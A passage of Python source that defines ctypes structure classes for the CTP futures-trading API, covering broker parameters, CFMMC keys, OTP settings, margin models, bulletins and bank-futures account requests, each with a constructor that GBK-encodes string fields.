        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("CurrencyID", CurrencyID),
            ("AccountID", AccountID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class BrokerTradingParams(Struct):
    """CTP struct: broker-level trading parameters (margin pricing, algorithm flags)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("MarginPriceType", c_char),
        ("Algorithm", c_char),
        ("AvailIncludeCloseProfit", c_char),
        ("CurrencyID", c_char_Array_4),
        ("OptionRoyaltyPriceType", c_char),
        ("AccountID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, MarginPriceType=None, Algorithm=None, AvailIncludeCloseProfit=None, CurrencyID=None, OptionRoyaltyPriceType=None, AccountID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("MarginPriceType", MarginPriceType),
            ("Algorithm", Algorithm),
            ("AvailIncludeCloseProfit", AvailIncludeCloseProfit),
            ("CurrencyID", CurrencyID),
            ("OptionRoyaltyPriceType", OptionRoyaltyPriceType),
            ("AccountID", AccountID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryBrokerTradingAlgos(Struct):
    """CTP request struct: query broker trading algorithms for an instrument."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
    ]
    def __init__(self, BrokerID=None, ExchangeID=None, InstrumentID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("ExchangeID", ExchangeID),
            ("InstrumentID", InstrumentID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class BrokerTradingAlgos(Struct):
    """CTP struct: the algorithm IDs a broker uses per exchange/instrument."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("HandlePositionAlgoID", c_char),
        ("FindMarginRateAlgoID", c_char),
        ("HandleTradingAccountAlgoID", c_char),
    ]
    def __init__(self, BrokerID=None, ExchangeID=None, InstrumentID=None, HandlePositionAlgoID=None, FindMarginRateAlgoID=None, HandleTradingAccountAlgoID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("ExchangeID", ExchangeID),
            ("InstrumentID", InstrumentID),
            ("HandlePositionAlgoID", HandlePositionAlgoID),
            ("FindMarginRateAlgoID", FindMarginRateAlgoID),
            ("HandleTradingAccountAlgoID", HandleTradingAccountAlgoID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QueryBrokerDeposit(Struct):
    """CTP request struct: query a broker's deposit at an exchange."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, ExchangeID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("ExchangeID", ExchangeID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class BrokerDeposit(Struct):
    """CTP struct: a broker's daily deposit / margin balances at an exchange."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("ParticipantID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("PreBalance", c_double),
        ("CurrMargin", c_double),
        ("CloseProfit", c_double),
        ("Balance", c_double),
        ("Deposit", c_double),
        ("Withdraw", c_double),
        ("Available", c_double),
        ("Reserve", c_double),
        ("FrozenMargin", c_double),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, ParticipantID=None, ExchangeID=None, PreBalance=None, CurrMargin=None, CloseProfit=None, Balance=None, Deposit=None, Withdraw=None, Available=None, Reserve=None, FrozenMargin=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("TradingDay", TradingDay, True),
            ("BrokerID", BrokerID, True),
            ("ParticipantID", ParticipantID, True),
            ("ExchangeID", ExchangeID, True),
            ("PreBalance", PreBalance, False),
            ("CurrMargin", CurrMargin, False),
            ("CloseProfit", CloseProfit, False),
            ("Balance", Balance, False),
            ("Deposit", Deposit, False),
            ("Withdraw", Withdraw, False),
            ("Available", Available, False),
            ("Reserve", Reserve, False),
            ("FrozenMargin", FrozenMargin, False),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryCFMMCBrokerKey(Struct):
    """CTP request struct: query a broker's CFMMC key."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]
    def __init__(self, BrokerID=None):
        super().__init__()
        # A truthy broker code is stored GBK-encoded for the C API.
        if BrokerID:
            self.BrokerID = BrokerID.encode("GBK")
class CFMMCBrokerKey(Struct):
    """CTP struct: a broker's CFMMC (futures margin monitoring) key record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ParticipantID", c_char_Array_11),
        ("CreateDate", c_char_Array_9),
        ("CreateTime", c_char_Array_9),
        ("KeyID", c_int),
        ("CurrentKey", c_char_Array_21),
        ("KeyKind", c_char),
    ]
    def __init__(self, BrokerID=None, ParticipantID=None, CreateDate=None, CreateTime=None, KeyID=None, CurrentKey=None, KeyKind=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("ParticipantID", ParticipantID, True),
            ("CreateDate", CreateDate, True),
            ("CreateTime", CreateTime, True),
            ("KeyID", KeyID, False),
            ("CurrentKey", CurrentKey, True),
            ("KeyKind", KeyKind, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class CFMMCTradingAccountKey(Struct):
    """CTP struct: the CFMMC key bound to a trading account."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ParticipantID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("KeyID", c_int),
        ("CurrentKey", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, ParticipantID=None, AccountID=None, KeyID=None, CurrentKey=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("ParticipantID", ParticipantID, True),
            ("AccountID", AccountID, True),
            ("KeyID", KeyID, False),
            ("CurrentKey", CurrentKey, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryCFMMCTradingAccountKey(Struct):
    """CTP request struct: query the CFMMC key of an investor's trading account."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class BrokerUserOTPParam(Struct):
    """CTP struct: one-time-password parameters for a broker user."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("OTPVendorsID", c_char_Array_2),
        ("SerialNumber", c_char_Array_17),
        ("AuthKey", c_char_Array_41),
        ("LastDrift", c_int),
        ("LastSuccess", c_int),
        ("OTPType", c_char),
    ]
    def __init__(self, BrokerID=None, UserID=None, OTPVendorsID=None, SerialNumber=None, AuthKey=None, LastDrift=None, LastSuccess=None, OTPType=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("UserID", UserID, True),
            ("OTPVendorsID", OTPVendorsID, True),
            ("SerialNumber", SerialNumber, True),
            ("AuthKey", AuthKey, True),
            ("LastDrift", LastDrift, False),
            ("LastSuccess", LastSuccess, False),
            ("OTPType", OTPType, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class ManualSyncBrokerUserOTP(Struct):
    """CTP request struct: manually synchronize a broker user's OTP token."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("OTPType", c_char),
        ("FirstOTP", c_char_Array_41),
        ("SecondOTP", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, UserID=None, OTPType=None, FirstOTP=None, SecondOTP=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("OTPType", OTPType),
            ("FirstOTP", FirstOTP),
            ("SecondOTP", SecondOTP),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class CommRateModel(Struct):
    """CTP struct: a commission-rate model definition."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("CommModelID", c_char_Array_13),
        ("CommModelName", c_char_Array_161),
    ]
    def __init__(self, BrokerID=None, CommModelID=None, CommModelName=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("CommModelID", CommModelID),
            ("CommModelName", CommModelName),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryCommRateModel(Struct):
    """CTP request struct: query commission-rate models."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("CommModelID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, CommModelID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("CommModelID", CommModelID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class MarginModel(Struct):
    """CTP struct: a margin model definition."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("MarginModelID", c_char_Array_13),
        ("MarginModelName", c_char_Array_161),
    ]
    def __init__(self, BrokerID=None, MarginModelID=None, MarginModelName=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("MarginModelID", MarginModelID),
            ("MarginModelName", MarginModelName),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryMarginModel(Struct):
    """CTP request struct: query margin models."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("MarginModelID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, MarginModelID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("MarginModelID", MarginModelID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class EWarrantOffset(Struct):
    """CTP struct: an e-warrant offset record for an investor."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("Direction", c_char),
        ("HedgeFlag", c_char),
        ("Volume", c_int),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, InvestorID=None, ExchangeID=None, InstrumentID=None, Direction=None, HedgeFlag=None, Volume=None, InvestUnitID=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("TradingDay", TradingDay, True),
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("ExchangeID", ExchangeID, True),
            ("InstrumentID", InstrumentID, True),
            ("Direction", Direction, True),
            ("HedgeFlag", HedgeFlag, True),
            ("Volume", Volume, False),
            ("InvestUnitID", InvestUnitID, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryEWarrantOffset(Struct):
    """CTP request struct: query e-warrant offsets for an investor."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None, InstrumentID=None, InvestUnitID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
            ("InstrumentID", InstrumentID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryInvestorProductGroupMargin(Struct):
    """CTP request struct: query an investor's product-group margin."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ProductGroupID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ProductGroupID=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ProductGroupID", ProductGroupID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class InvestorProductGroupMargin(Struct):
    """Margin figures per investor product group.

    String constructor arguments are GBK-encoded; numeric ones are stored
    as given. Arguments that are falsy (None, "", 0) are skipped, leaving
    the ctypes zero default.
    """
    _fields_ = [
        ("ProductGroupID", c_char_Array_31),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("FrozenMargin", c_double),
        ("LongFrozenMargin", c_double),
        ("ShortFrozenMargin", c_double),
        ("UseMargin", c_double),
        ("LongUseMargin", c_double),
        ("ShortUseMargin", c_double),
        ("ExchMargin", c_double),
        ("LongExchMargin", c_double),
        ("ShortExchMargin", c_double),
        ("CloseProfit", c_double),
        ("FrozenCommission", c_double),
        ("Commission", c_double),
        ("FrozenCash", c_double),
        ("CashIn", c_double),
        ("PositionProfit", c_double),
        ("OffsetAmount", c_double),
        ("LongOffsetAmount", c_double),
        ("ShortOffsetAmount", c_double),
        ("ExchOffsetAmount", c_double),
        ("LongExchOffsetAmount", c_double),
        ("ShortExchOffsetAmount", c_double),
        ("HedgeFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, ProductGroupID=None, BrokerID=None, InvestorID=None, TradingDay=None, SettlementID=None, FrozenMargin=None, LongFrozenMargin=None, ShortFrozenMargin=None, UseMargin=None, LongUseMargin=None, ShortUseMargin=None, ExchMargin=None, LongExchMargin=None, ShortExchMargin=None, CloseProfit=None, FrozenCommission=None, Commission=None, FrozenCash=None, CashIn=None, PositionProfit=None, OffsetAmount=None, LongOffsetAmount=None, ShortOffsetAmount=None, ExchOffsetAmount=None, LongExchOffsetAmount=None, ShortExchOffsetAmount=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # String fields: GBK-encode when truthy.
        for field, text in (("ProductGroupID", ProductGroupID), ("BrokerID", BrokerID),
                            ("InvestorID", InvestorID), ("TradingDay", TradingDay),
                            ("HedgeFlag", HedgeFlag), ("ExchangeID", ExchangeID),
                            ("InvestUnitID", InvestUnitID)):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned as-is when truthy.
        for field, number in (
            ("SettlementID", SettlementID), ("FrozenMargin", FrozenMargin),
            ("LongFrozenMargin", LongFrozenMargin), ("ShortFrozenMargin", ShortFrozenMargin),
            ("UseMargin", UseMargin), ("LongUseMargin", LongUseMargin),
            ("ShortUseMargin", ShortUseMargin), ("ExchMargin", ExchMargin),
            ("LongExchMargin", LongExchMargin), ("ShortExchMargin", ShortExchMargin),
            ("CloseProfit", CloseProfit), ("FrozenCommission", FrozenCommission),
            ("Commission", Commission), ("FrozenCash", FrozenCash),
            ("CashIn", CashIn), ("PositionProfit", PositionProfit),
            ("OffsetAmount", OffsetAmount), ("LongOffsetAmount", LongOffsetAmount),
            ("ShortOffsetAmount", ShortOffsetAmount), ("ExchOffsetAmount", ExchOffsetAmount),
            ("LongExchOffsetAmount", LongExchOffsetAmount),
            ("ShortExchOffsetAmount", ShortExchOffsetAmount),
        ):
            if number:
                setattr(self, field, number)
class QueryCFMMCTradingAccountToken(Struct):
    """Query struct for a CFMMC trading-account token; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
        super().__init__()
        for field, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID),
                            ("InvestUnitID", InvestUnitID)):
            if text:  # falsy args keep the zeroed ctypes default
                setattr(self, field, text.encode("GBK"))
class CFMMCTradingAccountToken(Struct):
    """CFMMC trading-account token record.

    Strings are GBK-encoded on assignment; KeyID is stored as an int.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ParticipantID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("KeyID", c_int),
        ("Token", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, ParticipantID=None, AccountID=None, KeyID=None, Token=None):
        super().__init__()
        for field, text in (("BrokerID", BrokerID), ("ParticipantID", ParticipantID),
                            ("AccountID", AccountID), ("Token", Token)):
            if text:
                setattr(self, field, text.encode("GBK"))
        if KeyID:  # numeric field, no encoding
            self.KeyID = KeyID
class QryProductGroup(Struct):
    """Query filter for a product group; strings stored GBK-encoded."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, ProductID=None, ExchangeID=None):
        super().__init__()
        for field, text in (("ProductID", ProductID), ("ExchangeID", ExchangeID)):
            if text:
                setattr(self, field, text.encode("GBK"))
class ProductGroup(Struct):
    """Product-group record; strings stored GBK-encoded."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("ProductGroupID", c_char_Array_31),
    ]
    def __init__(self, ProductID=None, ExchangeID=None, ProductGroupID=None):
        super().__init__()
        for field, text in (("ProductID", ProductID), ("ExchangeID", ExchangeID),
                            ("ProductGroupID", ProductGroupID)):
            if text:
                setattr(self, field, text.encode("GBK"))
class Bulletin(Struct):
    """Exchange bulletin record.

    String constructor arguments are GBK-encoded; BulletinID and SequenceNo
    are stored as ints. Falsy arguments leave the zeroed ctypes default.
    """
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("TradingDay", c_char_Array_9),
        ("BulletinID", c_int),
        ("SequenceNo", c_int),
        ("NewsType", c_char_Array_3),
        ("NewsUrgency", c_char),
        ("SendTime", c_char_Array_9),
        ("Abstract", c_char_Array_81),
        ("ComeFrom", c_char_Array_21),
        ("Content", c_char_Array_501),
        ("URLLink", c_char_Array_201),
        ("MarketID", c_char_Array_31),
    ]
    def __init__(self, ExchangeID=None, TradingDay=None, BulletinID=None, SequenceNo=None, NewsType=None, NewsUrgency=None, SendTime=None, Abstract=None, ComeFrom=None, Content=None, URLLink=None, MarketID=None):
        super().__init__()
        for field, text in (("ExchangeID", ExchangeID), ("TradingDay", TradingDay),
                            ("NewsType", NewsType), ("NewsUrgency", NewsUrgency),
                            ("SendTime", SendTime), ("Abstract", Abstract),
                            ("ComeFrom", ComeFrom), ("Content", Content),
                            ("URLLink", URLLink), ("MarketID", MarketID)):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (("BulletinID", BulletinID), ("SequenceNo", SequenceNo)):
            if number:
                setattr(self, field, number)
class QryBulletin(Struct):
    """Query filter for bulletins; strings GBK-encoded, IDs stored as ints."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("BulletinID", c_int),
        ("SequenceNo", c_int),
        ("NewsType", c_char_Array_3),
        ("NewsUrgency", c_char),
    ]
    def __init__(self, ExchangeID=None, BulletinID=None, SequenceNo=None, NewsType=None, NewsUrgency=None):
        super().__init__()
        for field, text in (("ExchangeID", ExchangeID), ("NewsType", NewsType),
                            ("NewsUrgency", NewsUrgency)):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (("BulletinID", BulletinID), ("SequenceNo", SequenceNo)):
            if number:
                setattr(self, field, number)
class ReqOpenAccount(Struct):
    """Bank-futures account-opening request.

    String constructor arguments are GBK-encoded on assignment; the numeric
    ones (PlateSerial, SessionID, InstallID, TID) are stored as given. Falsy
    arguments are skipped, keeping the zeroed ctypes default.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("CashExchangeCode", c_char),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("TID", c_int),
        ("UserID", c_char_Array_16),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, LongCustomerName=None):
        super().__init__()
        for field, text in (
            ("TradeCode", TradeCode), ("BankID", BankID), ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID), ("BrokerBranchID", BrokerBranchID), ("TradeDate", TradeDate),
            ("TradeTime", TradeTime), ("BankSerial", BankSerial), ("TradingDay", TradingDay),
            ("LastFragment", LastFragment), ("CustomerName", CustomerName),
            ("IdCardType", IdCardType), ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender), ("CountryCode", CountryCode), ("CustType", CustType),
            ("Address", Address), ("ZipCode", ZipCode), ("Telephone", Telephone),
            ("MobilePhone", MobilePhone), ("Fax", Fax), ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus), ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord), ("AccountID", AccountID), ("Password", Password),
            ("VerifyCertNoFlag", VerifyCertNoFlag), ("CurrencyID", CurrencyID),
            ("CashExchangeCode", CashExchangeCode), ("Digest", Digest),
            ("BankAccType", BankAccType), ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType), ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc), ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag), ("OperNo", OperNo), ("UserID", UserID),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (("PlateSerial", PlateSerial), ("SessionID", SessionID),
                              ("InstallID", InstallID), ("TID", TID)):
            if number:
                setattr(self, field, number)
class ReqCancelAccount(Struct):
    """Bank-futures account-cancellation request.

    Same field layout and constructor behavior as ReqOpenAccount: string
    arguments are GBK-encoded, numeric ones stored as given, falsy ones
    skipped (keeping the zeroed ctypes default).
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("CashExchangeCode", c_char),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("TID", c_int),
        ("UserID", c_char_Array_16),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, LongCustomerName=None):
        super().__init__()
        for field, text in (
            ("TradeCode", TradeCode), ("BankID", BankID), ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID), ("BrokerBranchID", BrokerBranchID), ("TradeDate", TradeDate),
            ("TradeTime", TradeTime), ("BankSerial", BankSerial), ("TradingDay", TradingDay),
            ("LastFragment", LastFragment), ("CustomerName", CustomerName),
            ("IdCardType", IdCardType), ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender), ("CountryCode", CountryCode), ("CustType", CustType),
            ("Address", Address), ("ZipCode", ZipCode), ("Telephone", Telephone),
            ("MobilePhone", MobilePhone), ("Fax", Fax), ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus), ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord), ("AccountID", AccountID), ("Password", Password),
            ("VerifyCertNoFlag", VerifyCertNoFlag), ("CurrencyID", CurrencyID),
            ("CashExchangeCode", CashExchangeCode), ("Digest", Digest),
            ("BankAccType", BankAccType), ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType), ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc), ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag), ("OperNo", OperNo), ("UserID", UserID),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (("PlateSerial", PlateSerial), ("SessionID", SessionID),
                              ("InstallID", InstallID), ("TID", TID)):
            if number:
                setattr(self, field, number)
class ReqChangeAccount(Struct):
    """Bank-futures account-change request (includes new bank account/password).

    String constructor arguments are GBK-encoded; PlateSerial, SessionID,
    InstallID and TID are stored as ints. Falsy arguments are skipped.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
